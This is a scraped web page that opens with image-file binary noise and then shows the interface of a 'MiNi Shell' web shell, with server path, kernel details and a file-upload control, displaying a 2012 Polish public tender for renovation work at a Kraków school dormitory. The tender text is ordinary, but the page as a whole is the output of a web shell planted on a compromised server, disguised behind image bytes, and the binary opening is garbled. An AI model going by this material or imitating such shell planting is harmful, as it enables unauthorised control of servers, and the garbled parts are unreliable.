JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120525/173782-N-2012.html

<p class="kh_header"><b>Kraków: Wykonanie izolacji budynku B wraz z wykonaniem opaski wokół budynku
                                          i remontu pomieszczeń- wykonanie remontu sanitariatów w budynku D oraz
                                          aneksu kuchennego na parterze  w budynku D w Bursie Szkolnictwa
                                          Ponadpodstawowego  Nr 1, al. Marszałka F. Focha 39 w Krakowie.</b><br>
<b>Numer ogłoszenia: 173782 - 2012; data zamieszczenia: 25.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bursa Szkolnictwa Ponadpodstawowego Nr 1 , al. marsz. Ferdynanda Focha 39, 30-119 Kraków, woj. małopolskie, tel. 0-12 422 86 68, 421 62 98, faks 0-12 422 86 68, 421 62 98.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://wwwbursa1.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Bursa Szkolnictwa Ponadpodstawowego Nr 1.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie izolacji budynku B wraz z wykonaniem opaski wokół budynku
                                          i remontu pomieszczeń- wykonanie remontu sanitariatów w budynku D oraz
                                          aneksu kuchennego na parterze  w budynku D w Bursie Szkolnictwa
                                          Ponadpodstawowego  Nr 1, al. Marszałka F. Focha 39 w Krakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  zamówienia w szczególności  jest :
a) Wykonanie izolacji budynku B wraz z wykonaniem opaski wokół budynku
Roboty izolacyjne zewnętrznych istniejących ścian fundamentowych budynku za wyjątkiem elewacji
Południowej z robotami towarzyszącymi, wraz z przełożeniem opaski i urządzeń odwadniających
oraz naprawą tynków dekoracyjnych. 
Wykonanie wykopów przy ścianach fundamentowych, deskowanie wykopów; odbicie tynków zewn; z zaprawy cementowej; oczyszczenie podłoża i uzupełnienie tynków; wykonanie izolacji uszczelnienia z jednoskładnikowej, sztywnej zaprawy; wykonanie izolacji 2x papa termozgrzewalna polimerowo-asfaltowa gr min. 4mm -każda warstwa; wykonanie tynków szlachetnych, zasypanie wykopów; ułożenie krawężników, kostki brukowej, płyt betonowych. Odtworzenie podestu przed wejściem do budynku. Wykonanie okładzin schodów zewnętrznych z płytek gresowych  antypoślizgowych mrozoodpornych  ułożonych na kleju elastycznym mrozoodpornym; Wywóz gruzu.
Powierzchnia izolowana:
-papa termozgrzewalna - 171,391 m2
-szlam cementowy - 12,182 m2;
Odtworzenie podestu przed wejściem do budynku. Wykonanie okładzin schodów zewnętrznych z
płytek gresowych  antypoślizgowych mrozoodpornych  ułożonych na kleju elastycznym mrozoodpornym; Wywóz gruzu.


        b) wykonanie remontu pomieszczeń- wykonanie remontu sanitariatów w budynku D oraz aneksu
        kuchennego na parterze  w budynku D
       - Zakres remontu sanitariatu parteru: wyburzenie fragmentów ścian działowych; rozbiórka okładzin;
        demontaż ścianek GK i sufitu podwieszanego;, demontaż opraw oświetleniowych, gniazd wtyczkowych, 
        wymiana posadzki na płytki gresowe antypoślizgowe;  zamurowania i uzupełnienia tynków; wykonanie 
        ścianek wydzielających łazienki z płyt GKBI, gr 12,5mm wraz z izolacją cieplną i przeciwdźwiękową z 
        wełny mineralnej; wykonanie izolacji folią w płynie ;wymiana stolarki drzwiowej; okładziny ścienne z 
        płytek  ceramicznych ; przygotowanie pow. do malowania; malowanie ścian i sufitów farbą  emulsyjna 
        akrylowa w kolorze białym; wykonanie instalacji elektrycznej wraz z montażem opraw oświetleniowych,
        gniazd wtyczkowych; wywóz gruzu z opłata za składowanie.
        
Dane liczbowe:
-nowe ścianki działowe - 10,883 m2
-pow. posadzek - 19.858 m2
-pow. flizowania - 57,822 m2
-pow. malowania - 45,727 m2

        - Zakres remontu aneksu kuchennego parteru: 
        rozbiórka okładzin ;wymiana posadzki na płytki gresowe 
        antypoślizgowe, okładziny ścienne i malowanie farbą  emulsyjną akrylowa w kolorze białym; malowanie 
        stolarki drzwiowej farbą olejną; wykonanie  instalacji elektrycznej , gniazd wtyczkowych  i wyłącznika; 
        wywóz gruzu z opłata za składowanie.

Dane liczbowe:
-pow. posadzek - 4,403 m2
-pow. flizowania - 8,72 m2
-pow. malowania - 13,532m2

Wewnętrzne instalacje wody zimnej, ciepłej i cyrkulacji w zakresie rozprowadzenia do poszczególnych przyborów z rur stalowych, instalacyjnych, ocynkowanych, o połączeniach gwintowanych. Instalacja podtynkowa w bruzdach ściennych. Przewody instalacji wody ciepłej wody użytkowej i cyrkulacji na całej długości izolowane cieplnie (powietrzno-szczelnie).
Odprowadzenie ścieków sanitarnych od poszczególnych przyborów sanitarnych /podejścia, piony/ z rur kanalizacyjnych z PCV. łączonych na uszczelkę gumową. Istniejące piony z rur żeliwnych, wraz z podejściami do przyborów do demontażu. Piony kanalizacyjne na całej długości kryte - w bruzdach pozostałych po zdemontowanej kanalizacji żeliwnej. Piony wyprowadzone ponad dach i zakończone rurami wywiewnymi. W dolnej części pionów rewizje.
Zakres remontu obejmuje:
-wymiana pionów kanalizacji na całej długości;
-wykonanie poziomów i pionów wodnych na całej długości;
-niezbędne demontaże;
-wykonanie podejść wodnych i kanalizacyjnych do przyborów w sanitariacie parteru i aneksie kuchennym na parterze;
-montaż nowych przyborów w sanitariacie parteru i aneksie kuchennym parteru;
-wpięcie istniejących przyborów w sanitariacie I piętra;
- przesunięcie kolidującego grzejnika;
Wentylacja w pomieszczeniach WC. i węzłach sanitarnych wykonana będzie z zastosowaniem wentylatorów o małej wydajności, zabudowanych na kanałach wentylacji wywiewnej.
Zastosowane wentylatory wywiewne wyposażone w czujniki obecności i klapy zwrotne. Zastosowana automatyka zapewni działanie wentylacji tylko podczas obecności
użytkowników w węzłach sanitarnych a wyposażenie wentylatorów w zwłoki czasowe wyłączy wentylacje dopiero po pewnym czasie (np. po 6 min.)
Instalacja wywiewna do wykonania rurami wentylacyjnymi z PCV w systemie zapewniającym kompletny system
rur, łączników i kształtek dla małych instalacji wentylacyjnych.
Przedmiar robót obejmuje:
-kompletny pion wentylacyjny dla trzech kondygnacji
-rozprowadzenie wentylacji wywiewnej w poziomie parteru
-montaż wentylatorów z ich podłączeniem w poziomie parteru

wg. przedmiaru robót stanowiącego załącznik  Nr 6, 7A, 7B, 7C, 8 do SIWZ ,Projektu remontu pokoi i łazienek w budynku D załącznik Nr 4 oraz Specyfikacji technicznej wykonania i odbioru robót załącznik Nr 9..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.23.30-0, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.42.10.00-4, 45.33.00.00-9, 45.33.12.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował do realizacji przedmiotowego zamówienia osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności  konstrukcyjno- budowlanej i  wykonywania tych czynności - która  będzie pełniła obowiązki kierownika  budowy. Dysponuje lub będzie dysponował do realizacji przedmiotowego zamówienia osobą posiadającą  uprawnienia do kierowania robotami budowlanymi w specjalności instalacji sanitarnych, 
 Kierownik budowy i kierownik robót instalacji sanitarnych musi przynależeć do właściwej Izby Samorządu Zawodowego.
Zamawiający dokona oceny spełnienia powyższych warunków metoda tj. spełnia lub nie spełnia na podstawie oświadczeń składanych przez Wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz ofertowy  załącznik Nr 1 do SIWZ,
b) oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu , o których mowa w art. 22 ust.1 ustawy Pzp, - załącznik Nr 2 do SIWZ, albo przez Pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia wg załącznika Nr 2 B do SIWZ,
c) oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, dotyczącym braku podstaw do wykluczenia, o którym mowa w art. 24 ust.1 ustawy Pzp - załącznik Nr 3 do SIWZ, albo przez Pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia wg załącznika Nr 3 B do SIWZ
d) oświadczenie, że osoba która będzie pełniła obowiązki kierownika budowy ( z pkt.1.3 pod. punkt  1.3.1- 1.3.3.), posiada wymagane przez Zamawiającego uprawnienia  - podpisane przez Wykonawcę albo przez Pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia wg. załącznika Nr 4 do SIWZ .
e) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru , w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt.2 ustawy,
f) pełnomocnictwo do reprezentacji Wykonawcy, o ile ofertę składa pełnomocnik,
g) kosztorysy ofertowe szczegółowe ( pełne) sporządzone ściśle wg. załączonego do SIWZ przedmiaru robót  ( zał. Nr 6, 7A, 7B, 7C, 8 ) i wytycznymi zawartymi w pkt. X SIWZ.

Cena brutto zawarta w ofercie winna być zaokrąglone do dwóch miejsc po przecinku i wpisana do formularza  ofertowego - zał. Nr 1 do SIWZ. Cena może być tylko jedna.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wwwbursa1.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bursia Szkolnictwa Ponadpodstawowego Nr 1 w Krakowie, al. Marszałka
 F. Focha 39-  w sekretariacie -parter..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 08:30, miejsce: Bursia Szkolnictwa Ponadpodstawowego Nr 1 w Krakowie, al. Marszałka
 F. Focha 39-  w sekretariacie -parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> SIWZ można odebrać w Bursie Szkolnictwa Ponadpodstawowego Nr 1 w od poniedziałku do piatku w godz.10-13 w sekretariacie- parter. SIWZ dostępna jesttakże na stronie internetowej Bursy http://wwwbursa1.krakow.pl . Zamawiajacy nie zamierza zawrzeć umowy ramowej. Zamawiajacy nie zamierza ustanawiać dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com